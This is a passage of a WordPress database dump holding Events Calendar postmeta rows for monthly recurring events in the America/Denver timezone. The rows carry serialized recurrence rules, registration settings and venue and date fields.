12:45:00'),(118326,262880,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513499;s:12:\"_EventOrigin\";i:1607513499;s:13:\"_thumbnail_id\";i:1607513499;s:26:\"_RTECregistrationsDisabled\";i:1607513499;s:17:\"_RTECdeadlineType\";i:1607513499;s:19:\"_RTECwhoCanRegister\";i:1607513499;s:23:\"_RTEClimitRegistrations\";i:1607513499;s:21:\"_RTECmaxRegistrations\";i:1607513499;s:24:\"boldgrid_hide_page_title\";i:1607513499;s:16:\"_EventRecurrence\";i:1607513499;s:17:\"_EventShowMapLink\";i:1607513499;s:13:\"_EventShowMap\";i:1607513499;s:13:\"_EventVenueID\";i:1607513499;s:20:\"_EventCurrencySymbol\";i:1607513499;s:22:\"_EventCurrencyPosition\";i:1607513499;s:10:\"_EventCost\";i:1607513499;s:9:\"_EventURL\";i:1607513499;s:14:\"_EventTimezone\";i:1607513499;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513499;}'),(116978,262879,'_EventEndDateUTC','2021-09-05 18:45:00'),(118583,262909,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513875;s:12:\"_EventOrigin\";i:1607513875;s:26:\"_RTECregistrationsDisabled\";i:1607513875;s:17:\"_RTECdeadlineType\";i:1607513875;s:19:\"_RTECwhoCanRegister\";i:1607513875;s:23:\"_RTEClimitRegistrations\";i:1607513875;s:21:\"_RTECmaxRegistrations\";i:1607513875;s:24:\"boldgrid_hide_page_title\";i:1607513875;s:16:\"_EventRecurrence\";i:1607513875;s:17:\"_EventShowMapLink\";i:1607513875;s:13:\"_EventShowMap\";i:1607513875;s:13:\"_EventVenueID\";i:1607513875;s:20:\"_EventCurrencySymbol\";i:1607513875;s:22:\"_EventCurrencyPosition\";i:1607513875;s:10:\"_EventCost\";i:1607513875;s:9:\"_EventURL\";i:1607513875;s:14:\"_EventTimezone\";i:1607513875;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513875;s:13:\"_thumbnail_id\";i:1607513875;}'),(116979,262879,'_EventDuration','4500'),(118361,262859,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513659;s:12:\"_EventOrigin\";i:1607513659;s:13:\"_thumbnail_id\";i:1607513659;s:26:\"_RTECregistrationsDisabled\";i:1607513659;s:17:\"_RTECdeadlineType\";i:1607513659;s:19:\"_RTECwhoCanRegister\";i:1607513659;s:23:\"_RTEClimitRegistrations\";i:1607513659;s:21:\"_RTECmaxRegistrations\";i:1607513659;s:24:\"boldgrid_hide_page_title\";i:1607513659;s:16:\"_EventRecurrence\";i:1607513659;s:17:\"_EventShowMapLink\";i:1607513659;s:13:\"_EventShowMap\";i:1607513659;s:13:\"_EventVenueID\";i:1607513659;s:20:\"_EventCurrencySymbol\";i:1607513659;s:22:\"_EventCurrencyPosition\";i:1607513659;s:10:\"_EventCost\";i:1607513659;s:9:\"_EventURL\";i:1607513659;s:14:\"_EventTimezone\";i:1607513659;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513659;}'),(118604,262910,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513875;s:12:\"_EventOrigin\";i:1607513875;s:26:\"_RTECregistrationsDisabled\";i:1607513875;s:17:\"_RTECdeadlineType\";i:1607513875;s:19:\"_RTECwhoCanRegister\";i:1607513875;s:23:\"_RTEClimitRegistrations\";i:1607513875;s:21:\"_RTECmaxRegistrations\";i:1607513875;s:24:\"boldgrid_hide_page_title\";i:1607513875;s:16:\"_EventRecurrence\";i:1607513875;s:17:\"_EventShowMapLink\";i:1607513875;s:13:\"_EventShowMap\";i:1607513875;s:13:\"_EventVenueID\";i:1607513875;s:20:\"_EventCurrencySymbol\";i:1607513875;s:22:\"_EventCurrencyPosition\";i:1607513875;s:10:\"_EventCost\";i:1607513875;s:9:\"_EventURL\";i:1607513875;s:14:\"_EventTimezone\";i:1607513875;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513875;s:13:\"_thumbnail_id\";i:1607513875;}'),(118605,262910,'protect_children',''),(118310,262879,'_RTECregistrationsDisabled','1'),(118311,262879,'_RTECdeadlineType','start'),(118312,262879,'_RTECwhoCanRegister','any'),(118313,262879,'_RTEClimitRegistrations','0'),(118314,262879,'_RTECmaxRegistrations','30'),(118308,262879,'_EventOrigin','events-calendar'),(118315,262879,'boldgrid_hide_page_title','0'),(118316,262879,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 11:30:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 12:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118317,262879,'_EventShowMapLink','1'),(118318,262879,'_EventShowMap','1'),(118319,262879,'_EventVenueID','262507'),(118320,262879,'_EventCurrencySymbol',''),(118321,262879,'_EventCurrencyPosition','prefix'),(118322,262879,'_EventCost',''),(118323,262879,'_EventURL',''),(118324,262879,'_EventTimezone','America/Denver'),(118325,262879,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262871;a:2:{s:9:\"timestamp\";i:1609673400;s:8:\"duration\";i:4500;}i:262872;a:2:{s:9:\"timestamp\";i:1612697400;s:8:\"duration\";i:4500;}i:262873;a:2:{s:9:\"timestamp\";i:1615116600;s:8:\"duration\";i:4500;}i:262874;a:2:{s:9:\"timestamp\";i:1617535800;s:8:\"duration\";i:4500;}i:262875;a:2:{s:9:\"timestamp\";i:1619955000;s:8:\"duration\";i:4500;}i:262876;a:2:{s:9:\"timestamp\";i:1622979000;s:8:\"duration\";i:4500;}i:262877;a:2:{s:9:\"timestamp\";i:1625398200;s:8:\"duration\";i:4500;}i:262878;a:2:{s:9:\"timestamp\";i:1627817400;s:8:\"duration\";i:4500;}i:262879;a:2:{s:9:\"timestamp\";i:1630841400;s:8:\"duration\";i:4500;}i:262880;a:2:{s:9:\"timestamp\";i:1633260600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(116394,262859,'_EventStartDate','2021-01-03 09:00:00'),(116395,262859,'_EventStartDateUTC','2021-01-03 16:00:00'),(116396,262859,'_EventEndDate','2021-01-03 10:15:00'),(116397,262859,'_EventEndDateUTC','2021-01-03 17:15:00'),(116398,262859,'_EventDuration','4500'),(118847,262954,'_EventCurrencyPosition','prefix'),(118382,262860,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513659;s:12:\"_EventOrigin\";i:1607513659;s:13:\"_thumbnail_id\";i:1607513659;s:26:\"_RTECregistrationsDisabled\";i:1607513659;s:17:\"_RTECdeadlineType\";i:1607513659;s:19:\"_RTECwhoCanRegister\";i:1607513659;s:23:\"_RTEClimitRegistrations\";i:1607513659;s:21:\"_RTECmaxRegistrations\";i:1607513659;s:24:\"boldgrid_hide_page_title\";i:1607513659;s:16:\"_EventRecurrence\";i:1607513659;s:17:\"_EventShowMapLink\";i:1607513659;s:13:\"_EventShowMap\";i:1607513659;s:13:\"_EventVenueID\";i:1607513659;s:20:\"_EventCurrencySymbol\";i:1607513659;s:22:\"_EventCurrencyPosition\";i:1607513659;s:10:\"_EventCost\";i:1607513659;s:9:\"_EventURL\";i:1607513659;s:14:\"_EventTimezone\";i:1607513659;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513659;}'),(151790,266078,'_thumbnail_id','266079'),(118366,262859,'_RTECregistrationsDisabled','1'),(118367,262859,'_RTECdeadlineType','start'),(118368,262859,'_RTECwhoCanRegister','any'),(118369,262859,'_RTEClimitRegistrations','0'),(118370,262859,'_RTECmaxRegistrations','30'),(118364,262859,'_EventOrigin','events-calendar'),(118371,262859,'boldgrid_hide_page_title','0'),(118372,262859,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118373,262859,'_EventShowMapLink','1'),(118374,262859,'_EventShowMap','1'),(118375,262859,'_EventVenueID','262507'),(118376,262859,'_EventCurrencySymbol',''),(118377,262859,'_EventCurrencyPosition','prefix'),(118378,262859,'_EventCost',''),(118379,262859,'_EventURL',''),(118380,262859,'_EventTimezone','America/Denver'),(118381,262859,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262859;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262860;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262861;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262862;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262863;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262864;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262865;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262866;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262867;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262868;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118362,262859,'protect_children',''),(118363,262859,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513659;s:12:\"_EventOrigin\";i:1607513659;s:13:\"_thumbnail_id\";i:1607513659;s:26:\"_RTECregistrationsDisabled\";i:1607513659;s:17:\"_RTECdeadlineType\";i:1607513659;s:19:\"_RTECwhoCanRegister\";i:1607513659;s:23:\"_RTEClimitRegistrations\";i:1607513659;s:21:\"_RTECmaxRegistrations\";i:1607513659;s:24:\"boldgrid_hide_page_title\";i:1607513659;s:16:\"_EventRecurrence\";i:1607513659;s:17:\"_EventShowMapLink\";i:1607513659;s:13:\"_EventShowMap\";i:1607513659;s:13:\"_EventVenueID\";i:1607513659;s:20:\"_EventCurrencySymbol\";i:1607513659;s:22:\"_EventCurrencyPosition\";i:1607513659;s:10:\"_EventCost\";i:1607513659;s:9:\"_EventURL\";i:1607513659;s:14:\"_EventTimezone\";i:1607513659;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513659;}'),(118418,262861,'_EventCurrencySymbol',''),(118419,262861,'_EventCurrencyPosition','prefix'),(118420,262861,'_EventCost',''),(118422,262861,'_EventTimezone','America/Denver'),(116424,262860,'_EventStartDate','2021-02-07 09:00:00'),(116425,262860,'_EventStartDateUTC','2021-02-07 16:00:00'),(118421,262861,'_EventURL',''),(116426,262860,'_EventEndDate','2021-02-07 10:15:00'),(116427,262860,'_EventEndDateUTC','2021-02-07 17:15:00'),(116428,262860,'_EventDuration','4500'),(118846,262954,'_EventCurrencySymbol',''),(118845,262954,'_EventVenueID','262507'),(118387,262860,'_RTECregistrationsDisabled','1'),(118388,262860,'_RTECdeadlineType','start'),(118389,262860,'_RTECwhoCanRegister','any'),(118390,262860,'_RTEClimitRegistrations','0'),(118385,262860,'_EventOrigin','events-calendar'),(118393,262860,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118394,262860,'_EventShowMapLink','1'),(118395,262860,'_EventShowMap','1'),(118396,262860,'_EventVenueID','262507'),(118397,262860,'_EventCurrencySymbol',''),(118398,262860,'_EventCurrencyPosition','prefix'),(118399,262860,'_EventCost',''),(118400,262860,'_EventURL',''),(118401,262860,'_EventTimezone','America/Denver'),(118402,262860,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262859;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262860;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262861;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262862;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262863;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262864;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262865;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262866;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262867;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262868;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118403,262861,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513659;s:12:\"_EventOrigin\";i:1607513659;s:13:\"_thumbnail_id\";i:1607513659;s:26:\"_RTECregistrationsDisabled\";i:1607513659;s:17:\"_RTECdeadlineType\";i:1607513659;s:19:\"_RTECwhoCanRegister\";i:1607513659;s:23:\"_RTEClimitRegistrations\";i:1607513659;s:21:\"_RTECmaxRegistrations\";i:1607513659;s:24:\"boldgrid_hide_page_title\";i:1607513659;s:16:\"_EventRecurrence\";i:1607513659;s:17:\"_EventShowMapLink\";i:1607513659;s:13:\"_EventShowMap\";i:1607513659;s:13:\"_EventVenueID\";i:1607513659;s:20:\"_EventCurrencySymbol\";i:1607513659;s:22:\"_EventCurrencyPosition\";i:1607513659;s:10:\"_EventCost\";i:1607513659;s:9:\"_EventURL\";i:1607513659;s:14:\"_EventTimezone\";i:1607513659;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513659;}'),(118383,262860,'protect_children',''),(118384,262860,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513659;s:12:\"_EventOrigin\";i:1607513659;s:13:\"_thumbnail_id\";i:1607513659;s:26:\"_RTECregistrationsDisabled\";i:1607513659;s:17:\"_RTECdeadlineType\";i:1607513659;s:19:\"_RTECwhoCanRegister\";i:1607513659;s:23:\"_RTEClimitRegistrations\";i:1607513659;s:21:\"_RTECmaxRegistrations\";i:1607513659;s:24:\"boldgrid_hide_page_title\";i:1607513659;s:16:\"_EventRecurrence\";i:1607513659;s:17:\"_EventShowMapLink\";i:1607513659;s:13:\"_EventShowMap\";i:1607513659;s:13:\"_EventVenueID\";i:1607513659;s:20:\"_EventCurrencySymbol\";i:1607513659;s:22:\"_EventCurrencyPosition\";i:1607513659;s:10:\"_EventCost\";i:1607513659;s:9:\"_EventURL\";i:1607513659;s:14:\"_EventTimezone\";i:1607513659;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513659;}'),(118391,262860,'_RTECmaxRegistrations','30'),(118392,262860,'boldgrid_hide_page_title','0'),(118423,262861,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262859;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262860;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262861;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262862;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262863;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262864;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262865;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262866;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262867;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262868;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(116454,262861,'_EventStartDate','2021-03-07 09:00:00'),(116455,262861,'_EventStartDateUTC','2021-03-07 16:00:00'),(118424,262862,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513659;s:12:\"_EventOrigin\";i:1607513659;s:13:\"_thumbnail_id\";i:1607513659;s:26:\"_RTECregistrationsDisabled\";i:1607513659;s:17:\"_RTECdeadlineType\";i:1607513659;s:19:\"_RTECwhoCanRegister\";i:1607513659;s:23:\"_RTEClimitRegistrations\";i:1607513659;s:21:\"_RTECmaxRegistrations\";i:1607513659;s:24:\"boldgrid_hide_page_title\";i:1607513659;s:16:\"_EventRecurrence\";i:1607513659;s:17:\"_EventShowMapLink\";i:1607513659;s:13:\"_EventShowMap\";i:1607513659;s:13:\"_EventVenueID\";i:1607513659;s:20:\"_EventCurrencySymbol\";i:1607513659;s:22:\"_EventCurrencyPosition\";i:1607513659;s:10:\"_EventCost\";i:1607513659;s:9:\"_EventURL\";i:1607513659;s:14:\"_EventTimezone\";i:1607513659;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513659;}'),(116456,262861,'_EventEndDate','2021-03-07 10:15:00'),(116457,262861,'_EventEndDateUTC','2021-03-07 17:15:00'),(116458,262861,'_EventDuration','4500'),(118844,262954,'_EventShowMap','1'),(118408,262861,'_RTECregistrationsDisabled','1'),(118409,262861,'_RTECdeadlineType','start'),(118410,262861,'_RTECwhoCanRegister','any'),(118411,262861,'_RTEClimitRegistrations','0'),(118412,262861,'_RTECmaxRegistrations','30'),(118406,262861,'_EventOrigin','events-calendar'),(118413,262861,'boldgrid_hide_page_title','0'),(118414,262861,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118415,262861,'_EventShowMapLink','1'),(118416,262861,'_EventShowMap','1'),(118417,262861,'_EventVenueID','262507'),(87460,131315,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(97050,131315,'_EventNextPendingRecurrence','2022-12-10 13:00:00'),(88078,259038,'protect_children',''),(88079,259038,'_tribe_modified_fields','a:28:{s:16:\"protect_children\";i:1582816250;s:12:\"_EventOrigin\";i:1582816250;s:13:\"_thumbnail_id\";i:1582816250;s:24:\"boldgrid_hide_page_title\";i:1582816250;s:16:\"_EventRecurrence\";i:1607075959;s:17:\"_EventShowMapLink\";i:1582816250;s:13:\"_EventShowMap\";i:1582816250;s:13:\"_EventVenueID\";i:1582816250;s:15:\"_EventStartDate\";i:1582816250;s:13:\"_EventEndDate\";i:1582816250;s:18:\"_EventStartDateUTC\";i:1582816250;s:16:\"_EventEndDateUTC\";i:1582816250;s:14:\"_EventDuration\";i:1582816250;s:20:\"_EventCurrencySymbol\";i:1582816250;s:22:\"_EventCurrencyPosition\";i:1582816250;s:10:\"_EventCost\";i:1582816250;s:9:\"_EventURL\";i:1582816250;s:14:\"_EventTimezone\";i:1582816250;s:18:\"_EventTimezoneAbbr\";i:1582816250;s:12:\"_dp_original\";i:1582816250;s:16:\"tribe_events_cat\";i:1582841450;s:10:\"_edit_last\";i:1607075959;s:26:\"_RTECregistrationsDisabled\";i:1607075959;s:17:\"_RTECdeadlineType\";i:1607075959;s:19:\"_RTECwhoCanRegister\";i:1607075959;s:23:\"_RTEClimitRegistrations\";i:1607075959;s:21:\"_RTECmaxRegistrations\";i:1607075959;s:22:\"_EventHideFromUpcoming\";i:1607075959;}'),(88080,259038,'_EventOrigin','events-calendar'),(88081,259038,'protect_children',''),(88082,259038,'protect_children',''),(88083,259038,'protect_children',''),(88084,259038,'_tribe_modified_fields','a:28:{s:16:\"protect_children\";i:1582816250;s:12:\"_EventOrigin\";i:1582816250;s:13:\"_thumbnail_id\";i:1582816250;s:24:\"boldgrid_hide_page_title\";i:1582816250;s:16:\"_EventRecurrence\";i:1607075959;s:17:\"_EventShowMapLink\";i:1582816250;s:13:\"_EventShowMap\";i:1582816250;s:13:\"_EventVenueID\";i:1582816250;s:15:\"_EventStartDate\";i:1582816250;s:13:\"_EventEndDate\";i:1582816250;s:18:\"_EventStartDateUTC\";i:1582816250;s:16:\"_EventEndDateUTC\";i:1582816250;s:14:\"_EventDuration\";i:1582816250;s:20:\"_EventCurrencySymbol\";i:1582816250;s:22:\"_EventCurrencyPosition\";i:1582816250;s:10:\"_EventCost\";i:1582816250;s:9:\"_EventURL\";i:1582816250;s:14:\"_EventTimezone\";i:1582816250;s:18:\"_EventTimezoneAbbr\";i:1582816250;s:12:\"_dp_original\";i:1582816250;s:16:\"tribe_events_cat\";i:1582841450;s:10:\"_edit_last\";i:1607075959;s:26:\"_RTECregistrationsDisabled\";i:1607075959;s:17:\"_RTECdeadlineType\";i:1607075959;s:19:\"_RTECwhoCanRegister\";i:1607075959;s:23:\"_RTEClimitRegistrations\";i:1607075959;s:21:\"_RTECmaxRegistrations\";i:1607075959;s:22:\"_EventHideFromUpcoming\";i:1607075959;}'),(88092,259038,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(104281,259038,'_EventHideFromUpcoming','yes'),(88085,259038,'_tribe_modified_fields','a:28:{s:16:\"protect_children\";i:1582816250;s:12:\"_EventOrigin\";i:1582816250;s:13:\"_thumbnail_id\";i:1582816250;s:24:\"boldgrid_hide_page_title\";i:1582816250;s:16:\"_EventRecurrence\";i:1607075959;s:17:\"_EventShowMapLink\";i:1582816250;s:13:\"_EventShowMap\";i:1582816250;s:13:\"_EventVenueID\";i:1582816250;s:15:\"_EventStartDate\";i:1582816250;s:13:\"_EventEndDate\";i:1582816250;s:18:\"_EventStartDateUTC\";i:1582816250;s:16:\"_EventEndDateUTC\";i:1582816250;s:14:\"_EventDuration\";i:1582816250;s:20:\"_EventCurrencySymbol\";i:1582816250;s:22:\"_EventCurrencyPosition\";i:1582816250;s:10:\"_EventCost\";i:1582816250;s:9:\"_EventURL\";i:1582816250;s:14:\"_EventTimezone\";i:1582816250;s:18:\"_EventTimezoneAbbr\";i:1582816250;s:12:\"_dp_original\";i:1582816250;s:16:\"tribe_events_cat\";i:1582841450;s:10:\"_edit_last\";i:1607075959;s:26:\"_RTECregistrationsDisabled\";i:1607075959;s:17:\"_RTECdeadlineType\";i:1607075959;s:19:\"_RTECwhoCanRegister\";i:1607075959;s:23:\"_RTEClimitRegistrations\";i:1607075959;s:21:\"_RTECmaxRegistrations\";i:1607075959;s:22:\"_EventHideFromUpcoming\";i:1607075959;}'),(88091,259038,'boldgrid_hide_page_title','1'),(88095,259038,'_EventVenueID','52069'),(88096,259038,'_EventStartDate','2020-03-01 13:00:00'),(88097,259038,'_EventEndDate','2020-03-01 14:00:00'),(88086,259038,'_tribe_modified_fields','a:28:{s:16:\"protect_children\";i:1582816250;s:12:\"_EventOrigin\";i:1582816250;s:13:\"_thumbnail_id\";i:1582816250;s:24:\"boldgrid_hide_page_title\";i:1582816250;s:16:\"_EventRecurrence\";i:1607075959;s:17:\"_EventShowMapLink\";i:1582816250;s:13:\"_EventShowMap\";i:1582816250;s:13:\"_EventVenueID\";i:1582816250;s:15:\"_EventStartDate\";i:1582816250;s:13:\"_EventEndDate\";i:1582816250;s:18:\"_EventStartDateUTC\";i:1582816250;s:16:\"_EventEndDateUTC\";i:1582816250;s:14:\"_EventDuration\";i:1582816250;s:20:\"_EventCurrencySymbol\";i:1582816250;s:22:\"_EventCurrencyPosition\";i:1582816250;s:10:\"_EventCost\";i:1582816250;s:9:\"_EventURL\";i:1582816250;s:14:\"_EventTimezone\";i:1582816250;s:18:\"_EventTimezoneAbbr\";i:1582816250;s:12:\"_dp_original\";i:1582816250;s:16:\"tribe_events_cat\";i:1582841450;s:10:\"_edit_last\";i:1607075959;s:26:\"_RTECregistrationsDisabled\";i:1607075959;s:17:\"_RTECdeadlineType\";i:1607075959;s:19:\"_RTECwhoCanRegister\";i:1607075959;s:23:\"_RTEClimitRegistrations\";i:1607075959;s:21:\"_RTECmaxRegistrations\";i:1607075959;s:22:\"_EventHideFromUpcoming\";i:1607075959;}'),(88088,259038,'_EventOrigin','events-calendar'),(88089,259038,'_EventOrigin','events-calendar'),(88093,259038,'_EventShowMapLink','1'),(88094,259038,'_EventShowMap','1'),(88087,259038,'_EventOrigin','events-calendar'),(88098,259038,'_EventStartDateUTC','2020-03-01 20:00:00'),(88099,259038,'_EventEndDateUTC','2020-03-01 21:00:00'),(88100,259038,'_EventDuration','3600'),(88101,259038,'_EventCurrencySymbol',''),(88102,259038,'_EventCurrencyPosition','prefix'),(88103,259038,'_EventCost',''),(88104,259038,'_EventURL',''),(88105,259038,'_EventTimezone','America/Denver'),(88106,259038,'_EventTimezoneAbbr','MST'),(88108,259038,'_dp_original','257632'),(88109,259038,'_edit_lock','1607101021:2'),(88140,259055,'_EventShowMapLink','1'),(88143,259055,'_EventStartDate','2020-03-12 18:00:00'),(88144,259055,'_EventEndDate','2020-03-12 19:30:00'),(88133,259055,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1582816274;s:12:\"_EventOrigin\";i:1582816274;s:13:\"_thumbnail_id\";i:1582816274;s:24:\"boldgrid_hide_page_title\";i:1582816274;s:17:\"_EventShowMapLink\";i:1582816274;s:13:\"_EventShowMap\";i:1582816274;s:13:\"_EventVenueID\";i:1582816274;s:15:\"_EventStartDate\";i:1582816509;s:13:\"_EventEndDate\";i:1582816509;s:18:\"_EventStartDateUTC\";i:1582816509;s:16:\"_EventEndDateUTC\";i:1582816509;s:14:\"_EventDuration\";i:1582816509;s:20:\"_EventCurrencySymbol\";i:1582816274;s:22:\"_EventCurrencyPosition\";i:1582816274;s:10:\"_EventCost\";i:1582816274;s:9:\"_EventURL\";i:1582816274;s:14:\"_EventTimezone\";i:1582816274;s:18:\"_EventTimezoneAbbr\";i:1582816509;s:12:\"_dp_original\";i:1582816274;s:16:\"tribe_events_cat\";i:1582841474;s:10:\"_edit_last\";i:1582816340;s:10:\"post_title\";i:1582816340;s:12:\"post_content\";i:1582816509;s:16:\"_EventRecurrence\";i:1606927730;s:11:\"post_status\";i:1582816509;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606927731;s:26:\"_RTECregistrationsDisabled\";i:1606927730;s:17:\"_RTECdeadlineType\";i:1606927730;s:19:\"_RTECwhoCanRegister\";i:1606927730;s:23:\"_RTEClimitRegistrations\";i:1606927730;s:21:\"_RTECmaxRegistrations\";i:1606927730;s:22:\"_EventHideFromUpcoming\";i:1606927730;}'),(88139,259055,'boldgrid_hide_page_title','1'),(88141,259055,'_EventShowMap','1'),(88142,259055,'_EventVenueID','52069'),(88134,259055,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1582816274;s:12:\"_EventOrigin\";i:1582816274;s:13:\"_thumbnail_id\";i:1582816274;s:24:\"boldgrid_hide_page_title\";i:1582816274;s:17:\"_EventShowMapLink\";i:1582816274;s:13:\"_EventShowMap\";i:1582816274;s:13:\"_EventVenueID\";i:1582816274;s:15:\"_EventStartDate\";i:1582816509;s:13:\"_EventEndDate\";i:1582816509;s:18:\"_EventStartDateUTC\";i:1582816509;s:16:\"_EventEndDateUTC\";i:1582816509;s:14:\"_EventDuration\";i:1582816509;s:20:\"_EventCurrencySymbol\";i:1582816274;s:22:\"_EventCurrencyPosition\";i:1582816274;s:10:\"_EventCost\";i:1582816274;s:9:\"_EventURL\";i:1582816274;s:14:\"_EventTimezone\";i:1582816274;s:18:\"_EventTimezoneAbbr\";i:1582816509;s:12:\"_dp_original\";i:1582816274;s:16:\"tribe_events_cat\";i:1582841474;s:10:\"_edit_last\";i:158